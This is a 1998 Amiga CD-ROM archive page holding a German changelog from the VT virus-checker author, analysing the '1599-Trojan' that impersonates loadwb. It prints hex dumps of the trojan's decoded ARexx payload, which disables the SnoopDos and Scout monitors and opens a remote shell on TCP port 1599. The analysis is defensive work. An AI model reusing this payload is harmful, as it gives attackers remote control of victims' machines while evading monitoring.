home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
EnigmA Amiga Run 1998 July
/
EnigmA AMIGA RUN 29 (1998)(G.R. Edizioni)(IT)[!][issue 1998-07 & 08].iso
/
earcd
/
utils
/
vttest3
/
schutz
/
vt3.06d-kurz
< prev
next >
Wrap
Text File
|
1998-03-01
|
4KB
|
80 lines
Heiner Schneegold
Am Steinert 8
97246 Eibelstadt
(Deutschland)
Tel: 09303/99104
(19.00 - 20.00 Uhr)
EMail: Heiner.Schneegold@t-online.de
letzte Aenderung: 98-03-01
Aenderungen seit VT3.05 VT-Laenge: 366144 Bytes
WICHTIG !!!!!
Um Linkviren SICHER zu finden, die sich HINTER
den 1.Hunk linken, MUESSEN Sie FileTest auf-
rufen !!!
- 1599-Trojan (Computer-Uebernahme) 98-02-27/28
;
------ bitte die Texte in VT.kennt.A-Z einfuegen --------
- 1599-Trojan (Computer-Uebernahme)
Mehrere Files sind notwendig
VT bietet loeschen an. Bitte kopieren Sie den Orginal-Loadwb-
Befehl neu.
WICHTIG !!! WICHTIG !!!!
Das Installer-File und/oder Archiv ist UNBEKANNT. Bitte
suchen Sie mit ???
c:loadwb (falsch) gepackt: 1192 Bytes
entpackt: 748 Bytes
l:startup.handler (loadwb echt) 1136 Bytes
l:background.handler 1700 Bytes
Meine Meinung: KEIN Programm OHNE Hintergedanken verschiebt
ein Programm aus c: nach l: und nimmt dessen Name an.
In loadwb (falsch) entpackt ist zu lesen:
ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL
3a204c3a 6261636b 67726f75 6e642e68 : L:background.h
616e646c 6572004c 3a737461 72747570 andler.L:startup
2e68616e 646c6572 00726578 786d6173 .handler.rexxmas
74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu..
In Wirklichkeit werden also mit DOS-Execute drei Programme
gestartet.
background.handler enthaelt einen mehrfach-codierten Bereich.
Im Speicher entsteht:
00000043 54455354 313a3b61 64647265 ...CTEST1:;addre
73732063 6f6d6d61 6e642027 57616974 ss command 'Wait
20313020 6d696e27 3b3b6966 2073686f 10 min';;if sho
77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1')
20746865 6e207369 676e616c 20534e4f then signal SNO
4f505445 53543b65 6c736520 7369676e OPTEST;else sign
616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:;
3b696620 73686f77 28277027 2c27414d ;if show('p','AM
49544350 27292074 68656e20 7369676e ITCP') then sign
616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els
65207369 676e616c 20544553 54313b53 e signal TEST1;S
4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho
77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS'
29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres
7320736e 6f6f7064 6f732071 7569743b s snoopdos quit;
454e443b 7369676e 616c2053 434f5554 END;signal SCOUT
54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:;
69662073 686f7728 2770272c 2753434f if show('p','SCO
55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a
64647265 73732073 636f7574 2e312051 ddress scout.1 Q
5549543b 454e443b 7369676e 616c2050 UIT;END;signal P
4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres
7320636f 6d6d616e 64202752 756e203c s command 'Run <
3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T
43503a31 35393927 3b736967 6e616c20 CP:1599';signal
54455354 313b6578 69740000 TEST1;exit..
Eine ARexx-Programmierung, eine Zeitschleife, Test auf Snoopdos
und Scout, newshell.
Nach Fremdaussage:
Es sollen unberechtigte Zugriffe (Passwoerter ausspaehen,
Format Partition) erfolgt sein.